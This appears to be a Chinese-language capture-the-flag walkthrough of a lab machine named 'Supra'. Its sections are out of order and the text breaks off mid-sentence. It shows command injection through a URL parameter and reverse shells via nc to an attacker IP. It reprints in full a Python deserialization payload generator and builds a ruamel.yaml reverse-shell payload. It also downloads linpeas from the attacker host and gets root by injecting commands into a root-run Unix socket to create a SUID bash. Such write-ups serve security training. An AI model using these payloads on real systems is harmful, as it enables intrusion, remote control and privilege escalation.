02:09 0:00 sshd: \/usr\/sbin\/sshd -D [listener] 0 of 10-100 startups\nroot 710 0.0 0.9 193784 19692 ? Ss 02:09 0:00 \/usr\/sbin\/apache2 -k start\nroot 794 0.0 0.0 0 0 ? I 02:14 0:00 [kworker\/0:1-ata_sff]\nroot 798 0.0 0.0 0 0 ? I 02:15 0:00 [kworker\/u2:1-flush-8:0]\nwww-data 799 0.0 0.0 2420 576 ? S 02:16 0:00 \/bin\/sh -c ps aux | grep root\nwww-data 801 0.0 0.0 6312 652 ? S 02:16 0:00 grep root\n :: root<\/code><\/pre>\n\u5c1d\u8bd5\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s "http:\/\/192.168.10.103:4000\/internal-processes-v1-display?uid=root|whoami;id"\nstdout: www-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n :: root|whoami;id<\/code><\/pre>\n\u5c1d\u8bd5\u53cd\u5f39shell\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s "http:\/\/192.168.10.103:4000\/internal-processes-v1-display?uid=root|nc+-e+\/bin\/bash+192.168.10.104+1234"<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@Supra:\/var\/www\/api$ ls -la\ntotal 132\ndrwxr-xr-x 5 root root 4096 Oct 10 2021 .\ndrwxr-xr-x 4 root root 4096 Oct 10 2021 ..\n-rw-r--r-- 1 root root 3666 Oct 10 2021 app.js\ndrwxr-xr-x 149 root root 4096 Oct 12 2021 node_modules\n-rw-r--r-- 1 root root 432 Oct 12 2021 package.json\n-rw-r--r-- 1 root root 101932 Oct 12 2021 package-lock.json\n-rwxr-xr-x 1 root root 24 Oct 10 2021 start.sh\ndrwxr-xr-x 2 www-data www-data 4096 Aug 9 00:20 uploads\ndrwxr-xr-x 2 root root 4096 Oct 10 2021 views\n(remote) www-data@Supra:\/var\/www\/api$ cat start.sh \n#!\/bin\/bash\nnode app.js\n(remote) www-data@Supra:\/var\/www\/api$ cat package.json \n{\n "name": "api",\n "version": "1.0.0",\n "description": "",\n "main": "app.js",\n "scripts": {\n "test": "echo \\"Error: no test specified\\" && exit 1"\n },\n "keywords": [],\n "author": "",\n "license": "ISC",\n "dependencies": {\n "ejs": "^3.1.6",\n "express": "^4.17.1",\n "generate-password": "^1.6.1",\n "ip-regex": "^4.3.0",\n "multer": "^1.4.3",\n "node-xwhois": "^2.0.10",\n "nodejs-base64": "^2.0.0"\n }\n}\n(remote) www-data@Supra:\/var\/www\/api$ sudo -l\nbash: sudo: command not found\n(remote) www-data@Supra:\/var\/www\/api$ ls -la \/home\/it404\/\ntotal 24\ndrwxr-xr-x 2 it404 it404 4096 Oct 12 2021 .\ndrwxr-xr-x 3 root root 4096 Oct 6 2021 ..\n-rw-r--r-- 1 it404 it404 220 Oct 6 2021 .bash_logout\n-rw-r--r-- 1 it404 it404 3526 Oct 6 2021 .bashrc\n-rw-r-----+ 1 root root 32 Oct 12 2021 local.txt\n-rw-r--r-- 1 it404 it404 807 Oct 6 2021 .profile<\/code><\/pre>\nACls\u67e5\u770b\u6587\u4ef6<\/h3>\n
\u770b\u5230\u4e00\u4e2a\u52a0\u53f7\uff0c\u660e\u663e\u662fAcls\u6743\u9650\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u6709\u54ea\u4e9b\u5185\u5bb9\uff1a<\/p>\n
(remote) www-data@Supra:\/home\/it404$ getfacl local.txt \n# file: local.txt\n# owner: root\n# group: root\nuser::rw-\nuser:it404:r--\ngroup::---\nmask::r--\nother::---\n(remote) www-data@Supra:\/home\/it404$ cat \/etc\/group | grep user\nusers:x:100:\n(remote) www-data@Supra:\/home\/it404$ cat \/etc\/group | grep mask<\/code><\/pre>\n\u53cd\u5e8f\u5217\u5316+yaml\u63d0\u5347\u7528\u6237\u6743\u9650<\/h3>\n
\u6ca1\u6536\u83b7\uff0c\u5148\u8bb0\u4e0b\uff0c\u67e5\u770b\u5176\u4ed6\u4fe1\u606f\uff1a<\/p>\n
(remote) www-data@Supra:\/home\/it404$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/sbin\/exim4\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/passwd\n\/usr\/bin\/umount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chsh\n\/usr\/bin\/newgrp\n\/usr\/bin\/chfn\n\/usr\/bin\/su\n\/usr\/bin\/mount\n(remote) www-data@Supra:\/home\/it404$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/ping cap_net_raw=ep\n(remote) www-data@Supra:\/home\/it404$ ss -tlunp\nNetid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process \nudp UNCONN 0 0 0.0.0.0:68 0.0.0.0:* \ntcp LISTEN 0 128 127.0.0.1:8081 0.0.0.0:* \ntcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:* \ntcp LISTEN 0 20 127.0.0.1:25 0.0.0.0:* \ntcp LISTEN 0 511 *:80 *:* \ntcp LISTEN 0 128 [::]:22 [::]:* \ntcp LISTEN 0 20 [::1]:25 [::]:* \ntcp LISTEN 0 511 *:4000 *:* users:(("node",pid=415,fd=18))<\/code><\/pre>\n\u53d1\u73b0\u5185\u90e8\u5f00\u653e\u4e86\u4e00\u4e2a25<\/code>\u53f7\u7aef\u53e3\u4ee5\u53ca8081<\/code>\u7aef\u53e3\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u6709\u5565\u6d88\u606f\uff1a<\/p>\n(remote) www-data@Supra:\/home\/it404$ ip a\n1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\n link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n inet 127.0.0.1\/8 scope host lo\n valid_lft forever preferred_lft forever\n inet6 ::1\/128 scope host \n valid_lft forever preferred_lft forever\n2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000\n link\/ether 08:00:27:f5:94:be brd ff:ff:ff:ff:ff:ff\n inet 192.168.10.103\/24 brd 192.168.10.255 scope global dynamic enp0s3\n valid_lft 6066sec preferred_lft 6066sec\n inet6 fd00:4c10:d50a:f900:a00:27ff:fef5:94be\/64 scope global dynamic mngtmpaddr \n valid_lft 86257sec preferred_lft 14257sec\n inet6 fe80::a00:27ff:fef5:94be\/64 scope link \n valid_lft forever preferred_lft forever\n(remote) www-data@Supra:\/home\/it404$ cd \/\n(remote) www-data@Supra:\/$ ls -la\ntotal 68\ndrwxr-xr-x 18 root root 4096 Oct 6 2021 .\ndrwxr-xr-x 18 root root 4096 Oct 6 2021 ..\nlrwxrwxrwx 1 root root 7 Oct 6 2021 bin -> usr\/bin\ndrwxr-xr-x 3 root root 4096 Oct 6 2021 boot\ndrwxr-xr-x 17 root root 3140 Aug 9 02:07 dev\ndrwxr-xr-x 86 root root 4096 Aug 9 02:07 etc\ndrwxr-xr-x 3 root root 4096 Oct 6 2021 home\nlrwxrwxrwx 1 root root 30 Oct 6 2021 initrd.img -> boot\/initrd.img-5.10.0-8-amd64\nlrwxrwxrwx 1 root root 30 Oct 6 2021 initrd.img.old -> boot\/initrd.img-5.10.0-8-amd64\nlrwxrwxrwx 1 root root 7 Oct 6 2021 lib -> usr\/lib\nlrwxrwxrwx 1 root root 9 Oct 6 2021 lib32 -> usr\/lib32\nlrwxrwxrwx 1 root root 9 Oct 6 2021 lib64 -> usr\/lib64\nlrwxrwxrwx 1 root root 10 Oct 6 2021 libx32 -> usr\/libx32\ndrwx------ 2 root root 16384 Oct 6 2021 lost+found\ndrwxr-xr-x 3 root root 4096 Oct 6 2021 media\ndrwxr-xr-x 2 root root 4096 Oct 6 2021 mnt\ndrwxr-xr-x 3 root root 4096 Oct 11 2021 opt\ndr-xr-xr-x 149 root root 0 Aug 9 01:38 proc\ndrwx------ 6 root root 4096 Oct 12 2021 root\ndrwxr-xr-x 18 root root 520 Aug 9 02:07 run\nlrwxrwxrwx 1 root root 8 Oct 6 2021 sbin -> usr\/sbin\ndrwxr-xr-x 2 root root 4096 Oct 6 2021 srv\ndr-xr-xr-x 13 root root 0 Aug 9 01:38 sys\ndrwxrwxrwt 10 root root 4096 Aug 9 02:14 tmp\ndrwxr-xr-x 14 root root 4096 Oct 6 2021 usr\ndrwxr-xr-x 12 root root 4096 Oct 6 2021 var\nlrwxrwxrwx 1 root root 27 Oct 6 2021 vmlinuz -> boot\/vmlinuz-5.10.0-8-amd64\nlrwxrwxrwx 1 root root 27 Oct 6 2021 vmlinuz.old -> boot\/vmlinuz-5.10.0-8-amd64\n(remote) www-data@Supra:\/$ cd opt\n(remote) www-data@Supra:\/opt$ ls -la\ntotal 12\ndrwxr-xr-x 3 root root 4096 Oct 11 2021 .\ndrwxr-xr-x 18 root root 4096 Oct 6 2021 ..\ndrwxr-xr-x 2 root root 4096 Oct 12 2021 api\n(remote) www-data@Supra:\/opt$ cd api\/\n(remote) www-data@Supra:\/opt\/api$ ls -la\ntotal 20\ndrwxr-xr-x 2 root root 4096 Oct 12 2021 .\ndrwxr-xr-x 3 root root 4096 Oct 11 2021 ..\n-rwxrwxrwx 1 www-data www-data 445 Oct 11 2021 accounts.yaml\n-rw-r--r-- 1 root root 609 Oct 12 2021 internal-api.py\n-rwxr-xr-x 1 root root 36 Oct 11 2021 start-internal.sh\n(remote) www-data@Supra:\/opt\/api$ cat start-internal.sh \n#!\/bin\/bash\npython3 internal-api.py\n(remote) www-data@Supra:\/opt\/api$ cat accounts.yaml \nemails:\n\n - Gloriawrong@zonnetd.nl\n - cheerfulMark93@atbt.net\n - horribleMicheal30@aliceaedsl.fr\n - Tamaradull@aiam.com\n - Grantitchy@lieve.ca\n - easyAngelica60@heatnet.nl\n - Rebekaheasy@lieve.com\n - zealousKatelyn@ggmail.com\n - depressedBridget62@yahooi.com.ar\n - fierceBrooke@optoniline.net\n\npasswords:\n\n - 6NpjqVCM\n - mzPdgc9V\n - fpRze8bn\n - x4Lm3W6M\n - tYUBN6Qx\n - 8zNBxXcd\n - X48UYKrw\n - xEfjB39C\n - Wk956r4a\n - UKQC5q2a(remote) www-data@Supra:\/opt\/api$ cat internal-api.py \nfrom flask import Flask, request\n#import yaml\nimport ruamel.yaml\nimport warnings\nfrom base64 import b64decode\n\nwarnings.simplefilter('ignore', ruamel.yaml.error.UnsafeLoaderWarning)\n\nfrom yaml.loader import FullLoader\napp = Flask(__name__)\n\n@app.route("\/", methods=["GET"])\ndef index():\n return "Supra Internals"\n\n@app.route("\/read-leaked-accounts", methods=["GET"])\ndef read():\n with open(r'.\/accounts.yaml') as file:\n #accounts = yaml.load(file, Loader=FullLoader)\n accounts = ruamel.yaml.load(file)\n return accounts\n\nif __name__ == '__main__':\n app.run("127.0.0.1", port=8081)<\/code><\/pre>\n\u627e\u5230\u4e86\u4ee3\u7801\uff0c\u4e14accounts.yaml<\/code>\u53ef\u5199\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u6709\u6ca1\u6709\u529e\u6cd5\u52ab\u6301\u914d\u7f6e\u6587\u4ef6\u641e\u70b9\u4e8b\u60c5\u3002<\/p>\n<\/div><\/p>\nhttps:\/\/book.hacktricks.xyz\/pentesting-web\/deserialization\/python-yaml-deserialization<\/a><\/p>\n\u5c1d\u8bd5\u770b\u4e00\u4e0b\u662f\u5426\u53ef\u4ee5\u641e\u4e8b\u60c5\uff1a<\/p>\n
import yaml\nfrom yaml import UnsafeLoader, FullLoader, Loader\nimport subprocess\n\nclass Payload(object):\n def __reduce__(self):\n return (subprocess.Popen,('ls',))\n\ndeserialized_data = yaml.dump(Payload()) # serializing data\nprint(deserialized_data)\n\n#!!python\/object\/apply:subprocess.Popen\n#- ls\n\nprint(yaml.load(deserialized_data, Loader=UnsafeLoader))\nprint(yaml.load(deserialized_data, Loader=Loader))\nprint(yaml.unsafe_load(deserialized_data))\n\n# python3 exp.py\n# !!python\/object\/apply:subprocess.Popen\n# - ls\n\n# <Popen: returncode: None args: 'ls'>\n# exp.py exp.sh result.txt\n# exp.py exp.sh result.txt\n# <Popen: returncode: None args: 'ls'>\n# <Popen: returncode: None args: 'ls'>\n# exp.py exp.sh result.txt<\/code><\/pre>\n\u4f46\u662f\u6267\u884c\u6548\u679c\u4e0d\u597d\uff0c\u53ef\u80fd\u4f7f\u7528\u9519\u4e86\uff0c\u5c1d\u8bd5\u4e00\u4e0b\u522b\u4eba\u5199\u7684\u811a\u672c\uff1ahttps:\/\/github.com\/j0lt-github\/python-deserialization-attack-payload-generator<\/a><\/p>\n# Python Deserialization attack payload file generator for pickle ,pyYAML, ruamel.yaml and jsonpickle module by j0lt\n# Requirements : Python 3.x , modules jsonpickle, pyyaml\n# Version : 2.3\n# Usage : python peas.py\n\nimport pickle\nfrom base64 import b64encode, b64decode\nimport jsonpickle\nimport yaml\nimport subprocess\nfrom copy import deepcopy\n\nclass Gen(object):\n def __init__(self, payload):\n self.payload = payload\n\n def __reduce__(self):\n return subprocess.Popen, (self.payload,)\n\nclass Payload(object):\n\n def __init__(self, c, location, base, os):\n self.location = location\n self.base = base\n self.os = os\n self.prefix = '' if self.os == 'linux' else "cmd.exe \/c "\n self.cmd = self.prefix+c\n self.payload = b''\n self.quotes = True if "\\'" in self.cmd or "\\"" in self.cmd else False\n\n def pick(self):\n self.payload = pickle.dumps(Gen(tuple(self.case().split(" "))))\n self.payload = self.verifyencoding()\n self.savingfile("_pick")\n\n def ya(self):\n if self.quotes:\n self.payload = b64decode("ISFweXRob24vb2JqZWN0L2FwcGx5OnN1YnByb2Nlc3MuUG9wZW4KLSAhIXB5dGhvbi90dXBsZQogIC0g"\n "cHl0aG9uCiAgLSAtYwogIC0gIl9faW1wb3J0X18oJ29zJykuc3lzdGVtKHN0cihfX2ltcG9ydF9fKCdiY"\n "XNlNjQnKS5iNjRkZWNvZGUoJw==") + b64encode(bytes(self.cmd, 'utf-8')) + \\\n b64decode("JykuZGVjb2RlKCkpKSI=")\n else:\n self.payload = bytes(yaml.dump(Gen(tuple(self.cmd.split(" ")))), 'utf-8')\n self.payload = self.verifyencoding()\n self.savingfile("_yaml")\n\n def js(self):\n self.payload = bytes(jsonpickle.encode(Gen(tuple(self.case().split(" ")))),\n 'utf-8')\n self.payload = self.verifyencoding()\n self.savingfile("_jspick")\n\n def __add__(self, other):\n return self + other\n\n def verifyencoding(self):\n return b64encode(self.payload) if self.base else self.payload\n\n def savingfile(self, suffix):\n open(self.location.__add__(suffix), "wb").write(self.payload)\n\n def chr_encode(self, data):\n d = '+'.join(['chr('+str(ord(ii))+')' for ii in data])\n return d\n\n def case(self):\n cmd = deepcopy(self.cmd)\n if self.quotes:\n cmd = self.prefix+"python -c exec({})".format(self.chr_encode("__import__('os').system"\n "(__import__('base64').b64decode({})"\n ".decode('utf-8'))".\n format(b64encode(bytes(self.cmd, 'utf-8')\n ))))\n return cmd \n\nif __name__ == "__main__":\n cmd = input("Enter RCE command :")\n o = 'linux' if input("Enter operating system of target [linux\/windows] . Default is linux :").lower() != "windows" \\\n else 'windows'\n b = True if input("Want to base64 encode payload ? [N\/y] :").lower() == "y" else False\n p = Payload(cmd, input("Enter File location and name to save :"), b, o)\n funtiondict = {"pickle": p.pick, "pyyaml": p.ya, "ruamel.yaml": p.ya, "jsonpickle": p.js}\n while 1:\n module = input("Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :").lower()\n if module in funtiondict.keys():\n funtiondict[module]()\n break\n elif module == "all":\n for i in funtiondict.keys():\n funtiondict[i]()\n break\n else:\n print("Wrong Input ")\n continue\n print("Done Saving file !!!!")<\/code><\/pre>\n\u5148\u5b89\u88c5\u4e00\u4e0b\u914d\u7f6e\u7684\u5e93\uff1a<\/p>\n
# requirements.txt\njsonpickle==1.2\nPyYAML==5.1.2<\/code><\/pre>\n\u7136\u540e\u751f\u6210\u8f7d\u8377;<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ python3 peas.py \nEnter RCE command :nc -e \/bin\/bash 192.168.10.104 2345\nEnter operating system of target [linux\/windows] . Default is linux :\nWant to base64 encode payload ? [N\/y] :N\nEnter File location and name to save :.\/badcode\nSelect Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :ruamel.yaml\nDone Saving file !!!!\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ ls -la\ntotal 604\ndrwxr-xr-x 2 kali kali 4096 Aug 9 02:53 .\ndrwxr-xr-x 121 kali kali 4096 Aug 9 01:06 ..\n-rw-r--r-- 1 kali kali 114 Aug 9 02:53 badcode_yaml\n-rw-r--r-- 1 kali kali 457 Aug 9 02:43 exp.py\n-rwxr-xr-x 1 kali kali 396 Aug 9 01:12 exp.sh\n-rwxr-xr-x 1 kali kali 3806 Aug 9 02:50 peas.py\n-rw-r--r-- 1 kali kali 593134 Aug 9 01:22 result.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ cat badcode_yaml \n!!python\/object\/apply:subprocess.Popen\n- !!python\/tuple\n - nc\n - -e\n - \/bin\/bash\n - 192.168.10.104\n - '2345'<\/code><\/pre>\n\u5148\u8fdb\u884c\u7aef\u53e3\u8f6c\u53d1\uff0c\u4f7f\u5916\u8fb9\u53ef\u4ee5\u8bbf\u95ee\uff1a<\/p>\n
(remote) www-data@Supra:\/opt\/api$ socat TCP-LISTEN:8082,fork TCP:127.0.0.1:8081 &\n[1] 1157<\/code><\/pre>\n\u7136\u540e\u5c1d\u8bd5\u5bfc\u5165\u8fdb\u884c\u8bbf\u95ee\uff1a<\/p>\n
# http:\/\/192.168.10.103:8082\/read-leaked-accounts\nInternal Server Error\nThe server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.<\/code><\/pre>\n<\/div><\/p>\nsocket.s\u63d0\u6743root<\/h3>\n
\u5c1d\u8bd5\u4e0a\u4f20linpeas.sh<\/code>\u8fdb\u884c\u63a2\u6d4b\uff1a<\/p>\n(remote) it404@Supra:\/tmp$ wget http:\/\/192.168.10.104:8888\/linpeas.sh\n(remote) it404@Supra:\/tmp$ chmod +x linpeas.sh\n(remote) it404@Supra:\/tmp$ .\/linpeas.sh<\/code><\/pre>\n\u53d1\u73b0\u4e86\uff1a<\/p>\n
\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 SGID\n\u255a https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation#sudo-and-suid\n-rwxr-sr-x 1 root shadow 38K Jul 9 2021 \/usr\/sbin\/unix_chkpwd\n-rwxr-sr-x 1 root mail 23K Feb 4 2021 \/usr\/bin\/dotlockfile\n-rwxr-sr-x 1 root crontab 43K Feb 22 2021 \/usr\/bin\/crontab\n-rwxr-sr-x 1 root tty 35K Jul 28 2021 \/usr\/bin\/wall\n-rwxr-sr-x 1 root root 15K Nov 19 2020 \/usr\/bin\/dotlock.mailutils\n-rwxr-sr-x 1 root shadow 31K Feb 7 2020 \/usr\/bin\/expiry\n-rwxr-sr-x 1 root tty 23K Jul 28 2021 \/usr\/bin\/write.ul (Unknown SGID binary)\n-rwxr-sr-x 1 root shadow 79K Feb 7 2020 \/usr\/bin\/chage\n-rwxr-sr-x 1 root ssh 347K Mar 13 2021 \/usr\/bin\/ssh-agent\n\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Files with ACLs (limited to 50)\n\u255a https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation#acls\n# file: \/home\/\/it404\/local.txt\nUSER root rw- \nuser it404 r-- \nGROUP root --- \nmask r-- \nother --- \n\n# file: \/usr\/local\/src\/socket.s\nUSER root rwx \nuser it404 rwx \nGROUP root r-x \nmask rwx \nother r-x<\/code><\/pre>\n\u53d1\u73b0\u5b58\u5728socket\u7684suid\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u662f\u5426\u53ef\u4ee5\u8fdb\u884c\u63d0\u6743\uff1a<\/p>\n
<\/div><\/p>\n\u8fdb\u884c\u63d0\u6743\uff1ahttps:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation\/socket-command-injection<\/a><\/p>\n(remote) it404@Supra:\/tmp$ netstat -a -p --unix | grep socket\n(Not all processes could be identified, non-owned process info\n will not be shown, you would have to be root to see it all.)\nActive UNIX domain sockets (servers and established)\nunix 2 [ ACC ] STREAM LISTENING 11938 - \/usr\/local\/src\/socket.s\nunix 6 [ ] DGRAM 10633 - \/run\/systemd\/journal\/socket\nunix 2 [ ACC ] STREAM LISTENING 11417 - \/run\/dbus\/system_bus_socket\nunix 3 [ ] STREAM CONNECTED 11668 - \/run\/dbus\/system_bus_socket\nunix 3 [ ] STREAM CONNECTED 11651 - \/run\/dbus\/system_bus_socket\nunix 3 [ ] STREAM CONNECTED 11652 - \/run\/dbus\/system_bus_socket\nunix 3 [ ] STREAM CONNECTED 11653 - \/run\/dbus\/system_bus_socket\n(remote) it404@Supra:\/tmp$ echo "cp \/bin\/bash \/tmp\/bash; chmod +s \/tmp\/bash; chmod +x \/tmp\/bash;" | socat - UNIX-CLIENT:\/usr\/local\/src\/socket.s\n(remote) it404@Supra:\/tmp$ ls -la \/bin\/bash\n-rwxr-xr-x 1 root root 1234376 Aug 4 2021 \/bin\/bash\n(remote) it404@Supra:\/tmp$ ls -la \/tmp\/bash\n-rwsr-sr-x 1 root root 1234376 Aug 9 03:36 \/tmp\/bash\n(remote) it404@Supra:\/tmp$ \/tmp\/bash -p\n(remote) root@Supra:\/tmp# cd ~\n(remote) root@Supra:\/home\/it404# cd \/root\n(remote) root@Supra:\/root# ls -la\ntotal 40\ndrwx------ 6 root root 4096 Oct 12 2021 .\ndrwxr-xr-x 18 root root 4096 Oct 6 2021 ..\n-rw------- 1 root root 475 Oct 12 2021 .bash_history\n-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc\ndrwxr-xr-x 3 root root 4096 Oct 11 2021 .cache\ndrwxr-xr-x 3 root root 4096 Oct 10 2021 .local\ndrwxr-xr-x 3 root root 4096 Oct 6 2021 .npm\n-rw-r--r-- 1 root root 161 Jul 9 2019 .profile\n-rw------- 1 root root 32 Oct 12 2021 proof.txt\ndrwxr-xr-x 2 root root 4096 Oct 12 2021 .s\n(remote) root@Supra:\/root# cd .s\n(remote) root@Supra:\/root\/.s# ls -la\ntotal 16\ndrwxr-xr-x 2 root root 4096 Oct 12 2021 .\ndrwx------ 6 root root 4096 Oct 12 2021 ..\n-rw-r--r-- 1 root root 495 Oct 12 2021 socket-root.py\n-rw-r--r-- 1 root root 35 Oct 12 2021 starts.sh\n(remote) root@Supra:\/root\/.s# cat socket-root.py \nimport socket\nimport os, os.path\nimport time\nfrom collections import deque \n\nif os.path.exists("\/usr\/local\/src\/socket.s"):\n os.remove("\/usr\/local\/src\/socket.s") \n\nserver = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\nserver.bind("\/usr\/local\/src\/socket.s")\nos.system("setfacl -m u:it404:rwx \/usr\/local\/src\/socket.s")\nwhile True:\n server.listen(1)\n conn, addr = server.accept()\n datagram = conn.recv(1024)\n if datagram:\n print(datagram)\n os.system(datagram)\n conn.close()\n(remote) root@Supra:\/root\/.s# cat starts.sh \n#!\/bin\/bash\npython3 socket-root.py<\/code><\/pre>\n\u62ff\u5230root\uff01<\/p>\n
\u989d\u5916\u6536\u83b7<\/h2>\n\u63a2\u6d4bfacl\u6587\u4ef6\u7684\u65b9\u6cd5<\/h3>\ngetfacl -t -s -R -p \/bin \/etc \/home \/opt \/root \/sbin \/usr \/tmp 2>\/dev\/null\n\n# file: \/home\/it404\/local.txt\nUSER root rw- \nuser it404 r-- \nGROUP root --- \nmask r-- \nother --- \n\n# file: \/usr\/local\/src\/socket.s\nUSER root rwx \nuser it404 rwx \nGROUP root r-x \nmask rwx \nother r-x<\/code><\/pre>\n\u53c2\u8003<\/h2>\n
https:\/\/www.bilibili.com\/video\/BV18t421w72D\/<\/a><\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83d\ude35 https:\/\/admin.tryhackme.com\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.103:22\nOpen 192.168.10.103:80\nOpen 192.168.10.103:4000\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 8.4p1 Debian 5 (protocol 2.0)\n| ssh-hostkey: \n| 3072 d9:75:70:c0:72:4c:4b:df:66:54:15:e7:77:37:44:18 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC3M700tkvIKlRU2W80ESj8iG6n1aHoOBcpf1Sg17U8kZe6AgY72CF7B1vmRvAnVJaYfMIOIO+qFLtGky\/+iKy48zcGOv3woQGoJaQBN0RsUrS2VR5lTYXR0iQKGF0AyexRIaBvWfMkMSmr5KOFTA5PXg9Q2GeyKWxnewsAm+7zgwGa0oE4J+qjikfWuqmKZOgOBzuBdK+fd2TQNcnglZhYfP3PPEMZY1ePxhCN\/wWecBBbjTXc67Tf5qADKsDliU9wdxp+Yv4u\/qe9cAcYlHdgC1MTGXN75Pn+IzWleUzqZS6CAGq2LHLxGx9J9W5VoHDns9enY9H19xINhYp312OvMQo9osaWqoR2w88fdpjAR6N\/7p2sPXvYG7sVfCb68T1Pjxsg\/9Nuy9QvfeWYqaIIt7Ry32Tt0Q0WTzegQpGRK8HsS4fGf7S2GDUs3FSfg\/PSCnIMZNqOM7BivwDOSxh14Elyy6AJXViYuycZO8QnOHAOMI5uWzbZ++ALlmdxMQs=\n| 256 3d:47:46:10:4a:5a:ee:b9:5f:94:61:bd:08:ff:7d:bb (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBK\/Sg1X3XisZwfkGdPEeBo+ObY7+QIGdPk4m2cweF+myUy87mVPaD56mIFz3pFozfxvZKCNH1LjMsGFH1lXQAso=\n| 256 be:bc:64:9a:c4:45:32:83:ed:6c:50:c2:2a:a1:a9:a4 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK0pzA44OqYBOt9Nk26VpZXfZrbRtmjgUiulqFY8N\/YS\n80\/tcp open http syn-ack Apache httpd 2.4.48 ((Debian))\n|_http-title: Apache2 Debian Default Page: It works\n| http-methods: \n|_ Supported Methods: POST OPTIONS HEAD GET\n|_http-server-header: Apache\/2.4.48 (Debian)\n4000\/tcp open http syn-ack Node.js (Express middleware)\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-title: NullTrace\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,html,txt -b 301,401,403,404\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.10.103\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 301,401,403,404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,html,txt\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html (Status: 200) [Size: 10701]\nProgress: 9776 \/ 882244 (1.11%)[ERROR] Get "http:\/\/192.168.10.103\/works.html": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/body.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n\nProgress: 83338 \/ 882244 (9.45%)\nProgress: 130744 \/ 882244 (14.82%)\nProgress: 175649 \/ 882244 (19.91%)\nProgress: 252871 \/ 882244 (28.66%)[ERROR] Get "http:\/\/192.168.10.103\/caepipe.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 379668 \/ 882244 (43.03%)[ERROR] Get "http:\/\/192.168.10.103\/51118853.html": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/Sell_Mat.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get 